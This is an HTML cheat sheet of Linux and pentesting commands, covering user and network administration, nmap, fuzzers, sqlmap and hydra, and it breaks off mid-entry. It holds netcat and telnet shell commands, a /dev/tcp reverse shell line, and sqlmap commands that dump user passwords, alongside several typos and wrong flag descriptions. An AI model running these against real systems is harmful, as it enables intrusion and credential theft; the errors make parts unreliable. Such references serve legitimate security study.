index.html

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Pentesting Ref</title>
  <link rel="stylesheet" href="css/style.css">
  <link href="https://fonts.googleapis.com/css2?family=Space+Mono:wght@400;700&display=swap" rel="stylesheet"> 
</head>
<body>
  <!-- <div class="heading">
    <h1>Pentesting <br> tools/utilities</h1>
  </div> -->

  <main>
    <h2>┌──────┴──────┐</h2>
    <h2>│<span class="spacer">aa</span>Pentesting<span class="spacer">a</span>│</h2>
    <h2>│<span class="spacer">aaaa</span>tools<span class="spacer">aaaa</span>│</h2>
    <h2>└─────────────┘</h2>

		
    <ul class="container">
			<p>┌───────────────────────────────────────────────────────────────</p>
			<span>├ </span><a href="examples.html">Blog</a>
			<p>└───────────────────────────────────────────────────────────────</p>
			<br>
      <p>┌───────┐</p>
      │<h3> Users</h3> │
      <p>├───────┘</p>
      <p>│</p>
      <li>
        ├ <span class="cmd">adduser</span> <span class="param">user</span>
        <span class="exp"> : adds user, will ask for password, adress, etc. </span>
        <br>│ <span class="exp">and will set default directory, shell automatically</span>
      </li>
      
      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">deluser</span> <span class="param">user</span><span class="exp"> : will delete specified user</span>
      </li>
      
      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">useradd</span><span class="exp"> : adds a user, but you have to specify things</span>
        <br>│<span class="ident"><span class="opt">-d</span><span class="exp"> : specifies the directory in wich the user will be created</span></span>
        <br>│<span class="ident"><span class="opt">-s</span><span class="exp"> : specifies the shell</span></span>
        <br>│<code>useradd -d /opt/admin -s /bin/bash</code>
      </li>
      
      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">su</span> <span class="param">user</span><span class="exp"> : login as <span class="param">user</span></span>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">adduser/deluser</span> <span class="param">user</span> <span class="exp">: add/delete <span class="param">user</span> from sudo group</span>
      </li>

      <p>│</p>
      <p>│</p>
      <p>│┌─────────┐</p>
      ├┤<h3>Network</h3> │
      <p>│└─────────┘</p>
      <p>│</p>

      <li>
        ├ <span class="cmd">ifconfig</span> <span class="exp">: shows informations like ip, netmasl, broadcast...</span>
        <br>│<span class="ident">
          <span class="param">network</span>
          <span class="param">ip</span>
          <span class="exp">: changes the ip of the <span class="param">network</span></span>
        </span>
        <br>│<code>ifconfig eth0 10.0.0.1 netmask 10.0.0.1</code>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">/etc/network/interfaces</span> <span class="exp">: configuration file, edit to config</span>
        <br>│<span class="ident"><span class="exp">get an automatic ip :</span></span>
        <br>│<code class="etc">auto <span class="param">interface</span></code>
        <br>│<code class="etc">iface <span class="param">interface</span> inet dhcp</code>
        <br>│<span class="ident"><span class="exp">get an static ip :</span></span>
        <br>│<code class="etc">auto <span class="param">interface</span></code>
        <br>│<code class="etc">iface eth0 net static</code>
        <br>│<code class="etc">adress <span class="param">ip</span></code>
        <br>│<code class="etc">netmask/broadcast <span class="param">ip</span></code>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">macchanger</span> <span class="exp">: changes mac address</span>
        <br>│ <span class="ident">
          <span class="opt">-r</span> <span class="param">interface</span> 
          <span class="exp">: changes <span class="param">interface</span> MAC to a random one</span>
        </span>
        <br>│ <span class="ident">
          <span class="opt">-m</span> <span class="param">MAC</span> <span class="param">interface</span>
          <span class="exp">: changes <span class="param">interface</span> MAC to <span class="param">mac</span></span>
        </span>
        <br>│ <span class="ident">
          <span class="opt">-p</span> <span class="param">interface</span>
          <span class="exp">: resets <span class="param">interface</span> MAC to original</span>
        </span>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>
      
      <li>
        ├ <span class="cmd">service networking restart</span> <span class="exp">: restart network service</span>
      </li>
      
      <p>├────────────────────────────────────────────────────────────────</p>
      
      <li>
        ├ <span class="cmd">/etc/init.d/networking restart</span> <span class="exp">: restart network</span>
      </li>
      
      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">route</span> <span class="exp">: show routes</span>
        <br>│ <span class="ident"><span class="opt">-n</span> <span class="exp">: show gateway ip</span></span>
        <br>│ <span class="ident">
          <span class="opt">del</span>/<span class="opt">add</span>
          <span class="param">route</span>
          <span class="exp">: del/add route</span>
        </span>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">netsat</span> <span class="exp">: show ports</span>
        <br>│ <span class="ident">
          <span class="opt">-l</span> <span class="exp">: listen ports</span>
        <br>│ <span class="ident">
          <span class="opt">-t</span> <span class="exp">: tcp ports</span>
        </span>
        <br>│ <span class="ident">
          <span class="opt">-u</span> <span class="exp">: ftp ports</span>
        <br>│ <span class="ident">
          <span class="opt">-n</span> <span class="exp">: show port number instead of the name</span>
        </span>
        <br>│ <span class="ident">
          <span class="opt">-p</span> <span class="exp">: show port PID</span>
        </span>
      </li>

      <p>│</p>
      <p>│</p>
      <p>│ ┌──────────┐</p>
      ├─┤<h3>Services</h3> │
      <p>│ └──────────┘</p>
      <p>│</p>
      
      <li>
        ├ <span class="cmd">service</span> <span class="param">service</span> <span class="opt">start/stop/restart</span>
        <span class="exp">: starts, stops or restarts a service</span>
        <br>│ <code>service ssh start</code>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">update-rc.d</span> <span class="param">service</span> <span class="opt">enable/disable</span>
        <span class="exp">: enable/disable service</span>
				<br> │ <span class="exp">to start on boot</span>
      </li>

      <p>│</p>
      <p>│</p>
      <p>│ <span class="spacer">a</span>┌──────────┐</p>
      ├──┤<h3>Archives</h3> │
      <p>│ <span class="spacer">a</span>└──────────┘</p>
      <p>│</p>

      <li>
        ├ <span class="cmd">locate</span> <span class="param">nameOfArchive</span>
        <span class="exp">: search an file in the system </span>
        <br>│ <span class="exp">if a file is created after boot, update db</span>
        <br>│ <code>updatedb | locate access.log</code>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">whereis</span> <span class="param">nameOfArchive</span>
        <span class="exp">: search an file in the system </span>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">find</span> <span class="param">directory</span> <span class="opt">-name</span> <span class="param">nameOfArchive</span>
        <span class="exp">: search <span class="param">nameOfArchive</span> in <span class="param">directory</span></span>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">which</span> <span class="param">nameOfBinary</span>
        <span class="exp">: searchs a binary in the system </span>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">tail/head</span> <span class="param">file</span>
        <span class="exp">: returns the last/first 10 lines of an archive </span>
        <br>│ <span class="ident">
          <span class="opt">-f</span> <span class="exp">: watch in real time</span>
        </span>
        <br>│ <span class="ident">
          <span class="opt">-n</span> <span class="param">int</span>
           <span class="exp">: display <span class="param">int</span> lines instead of 10</span>
        </span>
      </li>
      
      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">grep</span> <span class="param">something</span>
        <span class="exp">: searchs someting </span>
        <br>│ <code>cat /etc/passwd | grep '/bin/bash'</code>
        <br>│ <code>grep 'bin/bash /etc/passwd</code>
        <br>│ <span class="ident">
          <span class="opt">></span>
           <span class="exp">: creates an file with the output</span>
        </span>
        <br>│ <code>grep 'bin/bash' /etc/passwd > temBash.txt</code>
        <br>│ <span class="ident">
          <span class="opt">-v</span>
          <span class="exp">: searchs all that don't match</span>
        </span>
        <br>│ <code>grep -v 'bin/bash' /etc/passwd</code>
        <br>│ <span class="ident">
          <span class="cmd">egrep</span>
          <span class="exp">: instead of grep to search more params</span>
        </span>
        <br>│ <code>egrep 'nologin|false' /etc/passwd</code>
      </li>
      
      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">cut</span> <span class="opt">-d</span> <span class="param">delimiter</span> <span class="opt">-f</span><span class="param">num</span> <span class="param">file</span>
        <span class="exp">: cuts the <span class="param">file</span> by <span class="param">delimiter</span>, </span>
        <br>│ <span class="exp">and return the <span class="param">num</span> column </span>
        <br>│ <code>cut -d : -f1 /etc/passwd</code>
        <br>│ <span class="ident">
          <span class="opt">-f</span> <spam class="param">column 1</spam><span class="exp">,</span><spam class="param">column 1</spam>
          <span class="exp">: return more than one column</span>
        </span>
        <br>│ <code>cut -d : -f1 /etc/passwd</code>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">sed 's/<span class="param">toBeReplaced</span>/<span class="param">toReplace</span></span>' <span class="param">file</span>
        <span class="exp">: replaces <span class="param">toBeReplaced</span></span>
        <br>│ <span class="exp">with <span class="param">toReplace</span></span>
        <span class="exp"></span>
        <br>│ <span class="ident">
          <span class="opt">></span>
           <span class="exp">: creates an file with the output</span>
        </span>
        <br>│ <code>sed 's/bash/fish' /etc/passwd > /etc/passwd</code>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">uniq</span> <span class="exp">: use it with cut or grep, it get's the output</span>
        <br>│ <span class="exp">and sorts by a flag</span>
        <br>│ <span class="ident">
          <span class="opt">-c</span> <span class="exp">: counts the output</span>
        </span>
        <br>│ <code>cat /etc/passwd | grep '/bin/bash' | uniq -c</code>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">sort</span> <span class="exp">: sorts by a specific flag</span>
        <br>│ <span class="ident">
          <span class="opt">-n</span> <span class="exp">: sorts by number</span>
        </span>
        <br>│ <span class="ident">
          <span class="opt">-u</span> <span class="exp">: don't show repeated</span>
        </span>
        <br>│ <span class="ident">
          <span class="opt">-r</span> <span class="exp">: reverses the output</span>
        </span>
      </li>

      <p>│</p>
      <p>│</p>
      <p>│ <span class="spacer">aa</span>┌─────────┐</p>
      ├───┤<h3>Traffic</h3> │
      <p>│ <span class="spacer">aa</span>└─────────┘</p>
      <p>│</p>

      <li>
        ├ <span class="cmd">ping</span> <span class="param">ip</span>
        <span class="exp">: sends ICMP package to <span class="param">ip</span> </span>
        <br>│ <span class="ident">
          <span class="opt">-c</span> <span class="param">int</span>
          <span class="exp">: sends package <span class="param">int</span> times</span>
        </span>
        <br>│ <span class="ident">
          <span class="opt">-t</span> <span class="param">int</span>
          <span class="exp">: Time To Live (TTL)</span>
        </span>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>

			<li>
        ├ <span class="cmd">fping</span> <span class="param">ip</span>
        <span class="exp">: sends IMCP package to <span class="param">ip</span> </span>
        <br>│ <span class="ident">
          <span class="opt">-c</span> <span class="param">int</span>
          <span class="exp">: sends package <span class="param">int</span> times</span>
        </span>
        <br>│ <span class="ident">
          <span class="opt">-g</span> <span class="param">range</span>
          <span class="exp">: range of ips to scan</span>
        </span>
        <br>│ <span class="ident">
          <span class="opt">-a</span>
          <span class="exp">: shows only online hosts</span>
        </span>
				<br>│ <code> fping -g 192.168.0.1/24 -a</code>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">tcpdump</span>
        <span class="exp">: traffic analyzer </span>
        <br>│ <span class="ident">
          <span class="opt">-i</span> <span class="param">interface</span>
          <span class="exp">: specifies interface</span>
        </span>
        <br>│ <span class="ident">
          <span class="opt">-v</span>
          <span class="exp">: verbose</span>
        </span>
        <br>│ <span class="ident">
          <span class="opt">-w</span> <span class="param">file</span>
          <span class="exp">: write to <span class="param">file</span> </span>
        </span>
        <br>│ <span class="ident">
          <span class="opt">-r</span> <span class="param">file</span>
          <span class="exp">: reads <span class="param">file</span> </span>
        </span>
        <br>│ <span class="ident">
          <span class="opt">tcp/icmp/...</span>
          <span class="exp">: specifies a protocol</span>
        </span>
        <br>│ <code> tcpdump -vi eth0 icmp -w icmp.pcap</code>
        <br>│ <span class="ident">
          <span class="opt">-n </span>
          <span class="exp">: shows ip</span>
        </span>
        <br>│ <span class="ident">
          <span class="opt">-e </span>
          <span class="exp">: shows ethernet protocol</span>
        </span>
        <br>│ <span class="ident">
          <span class="opt">-A </span>
          <span class="exp">: ascii</span>
        </span>
        <br>│ <span class="ident">
          <span class="opt">-X </span>
          <span class="exp">: hexadecimal</span>
        </span>
        <br>│<code class="etc">can use: 
          host <span class="param">ip</span> /
          src host <span class="param">ip</span> /
          dst host <span class="param">ip</span> /
          port <span class="param">port</span>
        </code>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">host</span> <span class="param">dns</span>
        <span class="exp">: shows ip of <span class="param">dns</span> </span>
				<br>│ <span class="ident">
          <span class="opt">-t </span> <span class="param">type</span>
          <span class="exp">: type of register, SOA, A, AAAA, NS, MX or PTR</span>
        </span>
				<br>│ <span class="ident">
          <span class="opt">-l </span>
          <span class="exp">: lists hosts in a domain, uses AXFR </span>
          <br>│ <span class="exp"> <span class="spacer">aaaaaaaaa</span>(when the original dns stops working, another is used)</span>
        </span>
				<br> │ <span class="ident">
					<span class="opt">-v</span> <span class="exp">: verbose</span>
				</span>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">nc</span> <span class="param">url</span> <span class="param">port</span>
        <span class="exp">: connects with <span class="param">ip</span> in <span class="param">port</span> </span>
        <br>│<code class="etc">see default service ports in /etc/services</code>
        <br>│<code class="etc">everything the host do will log, even the ip</code>
        <br>│ <span class="ident">
          <span class="opt">-v </span>
          <span class="exp">: verbose</span>
        </span>
        <br>│ <span class="ident">
          <span class="opt">-l </span>
          <span class="exp">: listen</span>
        </span>
        <br>│ <span class="ident">
          <span class="opt">-p </span> <span class="param">port</span>
          <span class="exp">: port <span class="param">port</span></span>
        </span>
        <br>│ <span class="ident">
          <span class="opt">-n 
          <span class="exp">: shows ip</span>
        </span>
        <br>│ <span class="ident">
          <span class="opt">-u 
          <span class="exp">: shows udp ports, the default id tcp</span>
        </span>
        <br>│ <span class="ident">
          <span class="opt">-< <span class="param">file</span>
          <span class="exp">: sends <span class="param">file</span> on connection </span>
        </span>
        <br>│ <span class="ident">
          <span class="opt">-z <span class="param">host</span> <span class="param">port</span>
          <span class="exp">: scan to see if occupied </span>
        </span>
        <br>│<code class="etc">when using with -n, doesn't accept dns, only ip</code>
        <br>│ <span class="ident">
          <span class="opt">-e <span class="param">file/bin</span>
          <span class="exp">: executes <span class="param">file/bin</span> on connection </span>
        </span>
        <br>│<code>nc -vnlp 5050 -e /bin/bash</code>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">ncat</span>
        <span class="exp">: exactly line nc, but supports encryption </span>
        <br>│<code class="etc">generate ssl: </code>
				<br>│<code>openssl req -x 509 --newkey rsa 2048-keyout chave.pem -out cert.pem -days 10</code>
        <br>│<code>ncat -vnlp 443 --ssl-key <span class="param">name</span>.pem --ssl-cert <span class="param">cert</span>.pem </code>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">telnet</span> <span class="param">dns</span> <span class="param">port</span>
        <span class="exp">: connects with <span class="param">dns</span>:<span class="param">port</span> line netcat,</span>
        <br>│ <span class="exp">but a little more shitty</span>
        <br>│<code>telnet <span class="param">ip1</span> <span class="param">port1</span> | /bin/bash | telnet <span class="param">ip2</span> <span class="param">port2</span></code>
        <br>│<code class="etc">connects and sends shell to <span class="param">ip1</span> <span class="param">port1</span>, and outputs to <span class="param">ip2</span> <span class="param">port2</span></code>
        <br>│<code class="etc">OBS: can be the same ip</code>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">/dev/tcp</span>
        <span class="exp">: easily open tcp ports </span>
        <br>│<code>echo 'this will be send to the port' > /dev/tcp/192.168.0.200/4545</code>
        <br>│<code>bash -i > /dev/tcp/192.168.0.200/4545 0>&1 2>&1 </code>
        <br>│<code class="etc">sends bash to 192.168.0.200:4545 and shows input(0) e error(2) in the output(1)</code>
      </li>

      <p>│</p>
      <p>│</p>
      <p>│ <span class="spacer">aaa</span>┌──────────────────┐</p>
      ├────┤<h3>Info. gathering</h3> │
      <p>│ <span class="spacer">aaa</span>└──────────────────┘</p>
      <p>│</p>

      <li>
        ├ <span class="cmd">urlcrazy</span> <span class="param">url</span>
        <span class="exp">: similar disponible urls </span>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">theHarvester</span>
        <span class="exp">: cli dorking </span>
        <br>│ <span class="ident">
          <span class="opt">-d <span class="param">dns</span></span>
          <span class="exp">: specifyes dns</span>
        </span>
        <br>│ <span class="ident">
          <span class="opt">-l <span class="param">int</span></span>
          <span class="exp">: search limit</span>
        </span>
        <br>│ <span class="ident">
          <span class="opt">-b <span class="param">searcher</span></span>
          <span class="exp">: searcher to use, $theHarvester --help to see all</span>
        </span>
        <br>│ <span class="ident">
          <span class="opt">-f <span class="param">file.html</span></span>
          <span class="exp">: write output to <span class="param">file.html</span></span>
        </span>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">exiftool <span class="param">doc</span></span>
        <span class="exp">: see metadata of <span class="param">doc</span> </span>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">lynx <span class="param">dns</span></span>
        <span class="exp">: cli browser </span>
        <br>│ <span class="ident">
          <span class="opt">--dump </span>
          <span class="exp">: only outputh the html, no interantion, for making scripts</span>
        </span>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">whois <span class="param">dns</span></span>
        <span class="exp">: iana whois, via cli </span>
        <br>│ <span class="ident">
          <span class="opt">-h <span class="param">url</span></span>
          <span class="exp">: specifyes a whois searcher,ex: whois.iana.org</span>
        </span>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">bgpview.io/bgp.net</span>
        <span class="exp">: websites info like asn/netblock, if there's a dns  </span>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">wafw00f</span>
        <span class="exp">: web app firewall toolkit (checks for firewall) </span>
				<br>│ <span class="ident">
          <span class="opt">-v </span>
          <span class="exp">: verbose</span>
        </span>
				<br>│ <span class="ident">
          <span class="opt">-r </span>
          <span class="exp">: don't follow redirect (300)</span>
        </span>
				<br> │ <code>wafw00f -v testphp.vulnweb.com</code>
      </li>

      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">whatweb</span>
        <span class="exp">: discover web thecnologies being used </span>
				<br>│ <span class="ident">
          <span class="opt">-v </span>
          <span class="exp">: verbose</span>
        </span>
				<br>│ <span class="ident">
          <span class="opt">-a <span class="param">int</span> </span>
          <span class="exp">: agressivy, 1, 3 and 4</span>
					<br> │ <code>whatweb -a 3 http://testphp.vulnweb.com</code>
        </span>
      </li>

			<p>├────────────────────────────────────────────────────────────────</p>

			<li>
				├ <span class="cmd">ffuf</span> <span class="exp">: web fuzzer</span>
				<br> │ <span class="ident">
					<span class="opt">-u <span class="param">url</span></span>
					<span class="exp">: specifies url</span>
				</span>
				<br> │ <code class="etc">&lturl&gt:FUZZ to sppecify where to brute force</code>
				<br> │ <span class="ident">
					<span class="opt">-w <span class="param">wordlist</span></span>
					<span class="exp">: specifies worlist to use</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-e <span class="param">ext</span></span>
					<span class="exp">: specifies extension (.php, .html)</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-recursion</span>
					<span class="exp">: enables recursion</span>
				</span>

			<p>├────────────────────────────────────────────────────────────────</p>

			<li>
				├ <span class="cmd">wfuzz</span> <span class="exp">: web fuzzer</span>
				<br> │ <span class="ident">
					<span class="opt">-c </span>
					<span class="exp">: enables colored output</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-l <span class="param">type</span>,<span class="param">param</span></span>
					<span class="exp">: what to use in fuzzing</span>
				</span>
				<br> │ <code class="etc">wfuzz -c -z file,wordlist.txt http://testphp.vulnweb.com?FUZZ=admin.php</code>
				<br> │ <span class="ident">
					<span class="opt">-hl/hw/hh <span class="param">int</span></span>
					<span class="exp">: hide line/word/char with <span class="param">int</span></span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-sl/sw/sh <span class="param">int</span></span>
					<span class="exp">: only show line/word/char with <span class="param">int</span></span>
				</span>
			</li>

			<p>├────────────────────────────────────────────────────────────────</p>

			<li>
				├ <span class="cmd">dirb</span> <span class="exp">: web dir fuzzer</span>
				<br> │ <span class="ident">
					<span class="opt">-t</span>
					<span class="exp">: doesn't use a '/' in the end</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-a <span class="param">user_agent</span></span>
					<span class="exp">: defines a user-agent</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-S </span>
					<span class="exp">: silent mode</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-X <span class="param">ext</span></span>
					<span class="exp">: specifies extension (.php, .html)</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-u <span class="param">user:pass</span></span>
					<span class="exp">: if needed for HTTP login </span>
				</span>
				<br> │ <code class="etc">dirb http://testphp.vulnweb.com/login -u admin:admin</code>
				<br> │ <span class="ident">
					<span class="opt">-r</span>
					<span class="exp">: disables recursion </span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-R</span>
					<span class="exp">: interactive recursion, will prompt if you want to</span>
				<br> │ <span class="ident">
					<span class="opt">-o <span class="param">file</span></span>
					<span class="exp">: writes output to <span class="param">file</span></span>
				</span>
				<br> │ <code class="etc">dirb http://testphp.vulnweb.com /usr/share/dirb/wordlists/common.txt -a "Chrome"</code>
			</li>

			<p>├────────────────────────────────────────────────────────────────</p>

			<li>
				├ <span class="cmd">dnsenum</span> <span class="exp">: multi purpose dns tool</span>
				<br> │ <span class="ident">
					<span class="opt">--enum <span class="param">dns</span></span>
					<span class="exp">: dns to scan</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-f <span class="param">wordlist</span></span>
					<span class="exp">: wordlist to sub domain brute force</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-w</span>
					<span class="exp">: performs whois</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-r</span>
					<span class="exp">: enables recursion</span>
				</span>
			</li>

			<p>├────────────────────────────────────────────────────────────────</p>

			<li>
				├ <span class="cmd">nmap <span class="param">ip/range</span></span> <span class="exp">: scans entire netword in <span class="param">range</span></span>
				<br> │ <code>nmap 192.168.0.0/24</code>
				<br> │ <span class="ident">
					<span class="opt">-v</span>
					<span class="exp">: verbose</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-T <span class="param">level</span></span>
					<span class="exp">: specifies agressivity</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-n</span>
					<span class="exp">: show ip, don't resolve</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-O</span>
					<span class="exp">: identifies OS</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-F</span>
					<span class="exp">: fast scan, 100 most common ports</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-sn</span>
					<span class="exp">: ping scan</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-sV</span>
					<span class="exp">: service version</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-sF</span>
					<span class="exp">: sends FYN flag</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-sT</span>
					<span class="exp">: sends full TCP protocol</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-sS</span>
					<span class="exp">: stealthy scan, (SYN scan)</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-sU</span>
					<span class="exp">: UDP scan</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-p <span class="param">port</span></span>
					<span class="exp">: specifies port, a '-' scans all</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-g <span class="param">dst_port</span></span>
					<span class="exp">: specifies a destination port</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-D <span class="param">ip</span></span>
					<span class="exp">: sets <span class="param">ip</span> as decoy, decoy will </span>
					<br>│ <span class="exp"> <span class="spacer">aaaaaaaaaaaaaa</span>send the same traffic as you, hardening identification</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">--script <span class="param">script</span></span>
					<span class="exp">: specifies script to use</span>
				</span>
				<br> │ <code>nmap --script vuln 192.168.0.110</code>
				<br> │ <span class="ident">
					<span class="opt">-SC </span>
					<span class="exp">: use scripts with scan, less noisy alternative to -A</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">--open</span>
					<span class="exp">: show only open ports</span>
					<br> │ <code>nmap -D RND:20 --open -sS -p- 192.168.0.1 -oN portsH</code>
				</span>
				<br> │ <span class="ident">
					<span class="opt">--exclude <span class="param">ip</span></span>
					<span class="exp">: excludes an ip from scan</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-iL <span class="param">list</span></span>
					<span class="exp">: list of hosts to scan</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-iR <span class="param">int</span></span>
					<span class="exp">: number of hosts to attack </span>
					<br> │<span class="spacer">aaaaaaaaaaaaaaaaa</span><span class="exp">simutaniously with, bypas afirewall</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-PN <span class="param">port</span></span>
					<span class="exp">: don't ping beore sending package, exclude </span>
					<br> │<span class="spacer">aaaaaaaaaaaaaaaaaa</span><span class="exp">parameter to apply to all, bypass firewall</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-PU <span class="param">port</span></span>
					<span class="exp">: send UDP package, exclude parameter</span>
					<br> │<span class="spacer">aaaaaaaaaaaaaaaaaa</span><span class="exp">to apply to all, bypass firewall</span>
				<br> │ <span class="ident">
					<span class="opt">-oN <span class="param">file</span></span>
					<span class="exp">: writes to <span class="param">file</span></span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-oX <span class="param">file</span></span>
					<span class="exp">: writes to <span class="param">file</span> in xml format</span>
				</span>
			</li>

      <p>├────────────────────────────────────────────────────────────────</p>

      <li>
        ├ <span class="cmd">sqlmap</span>
        <span class="exp">: sql injection and info </span>
				<br>│ <span class="ident">
          <span class="opt">-v </span>
          <span class="exp">: verbose</span>
        </span>
				<br>│ <span class="ident">
          <span class="opt">-u <span class="param">url</span></span>
          <span class="exp">: specifies url</span>
        </span>
				<br>│ <span class="ident">
          <span class="opt">--current-db</span>
          <span class="exp">: grabs current db in production</span>
        </span>
				<br>│ <span class="ident">
          <span class="opt">--threads <span class="param">int</span></span>
          <span class="exp">: specifies how many threads to use</span>
        </span>
				<br> │ <code>sqlmap -u "store.com/prod.php?prod=844" --current-db</code>
				<br> │ <code class="etc">OBS: needs to be an entry point</code>
				<br>│ <span class="ident">
          <span class="opt">-dbs </span>
          <span class="exp">: grabs all dbs</span>
        </span>
				<br>│ <span class="ident">
          <span class="opt">-D <span class="param">db_name</span></span>
          <span class="exp">: specifies db to get info</span>
        </span>
				<br>│ <span class="ident">
          <span class="opt">--tables</span>
          <span class="exp">: grabs tables of specified db</span>
        </span>
				<br>│ <code>sqlmap -u "store.com/prod.php?prod=844" -D store --tables</code>
				<br>│ <span class="ident">
          <span class="opt">-T <span class="param">table</span></span>
          <span class="exp">: specifies table to get info</span>
        </span>
				<br>│ <span class="ident">
          <span class="opt">--columns</span>
          <span class="exp">: grabs columns of specifies table</span>
        </span>
				<br>│ <code>sqlmap -u "store.com/prod.php?prod=844" -D store -T users --columns</code>
				<br>│ <span class="ident">
          <span class="opt">-C <span class="param">column</span></span>
          <span class="exp">: specifies column to get info</span>
        </span>
				<br>│ <span class="ident">
          <span class="opt">--dump</span>
          <span class="exp">: grabs text of specifies table</span>
        </span>
				<br>│ <code>sqlmap -u "store.com/prod.php?prod=844" -D store -T users -C 'name,email,password' --dump</code>
      </li>

			<p>│</p>
      <p>│</p>
      <p>│ <span class="spacer">aaaa</span>┌──────────┐</p>
      ├─────┤<h3>Cracking</h3> │
      <p>│ <span class="spacer">aaaa</span>└──────────┘</p>
      <p>│</p>

			<li>
				├ <span class="cmd">hash-dentifier</span> <span class="exp">: identify hashes</span>
				<br> │ <code>hash-identifier</code>
			</li>

			<p>├────────────────────────────────────────────────────────────────</p>

			<li>
				├ <span class="cmd">crunch</span> <span class="exp">: custom wordlist generator</span>
				<br> │ <code>crunch 9 9 -f charset.lst numeric -t admin@@@@</code>
				<br> │ <code class="etc">crunch &ltmin chars / max chars></code>
				<br> │ <code class="etc">/etc/crunch/carset.lst contains characers</code>
				<br> │ <code class="etc">the @ specifies where to user the characters</code>
			</li>

			<p>├────────────────────────────────────────────────────────────────</p>

			<li>
				├ <span class="cmd">hydra</span> <span class="exp">: password cracker</span>
				<br> │ <span class="ident">
					<span class="opt">-l <span class="param">user</span></span>
					<span class="exp">: user to try login on</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-L <span class="param">wordlist</span></span>
					<span class="exp">: wordlist of users to try login on</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-p <span class="param">password</span></span>
					<span class="exp">: password to try login on</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-P <span class="param">wordlist</span></span>
					<span class="exp">: specifies wordlist to brute-force as password</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-s <span class="param">port</span></span>
					<span class="exp">: specifies port</span>
				</span>
				<br> │ <span class="ident">
					<span class="opt">-m <span class="param">param</span></span>
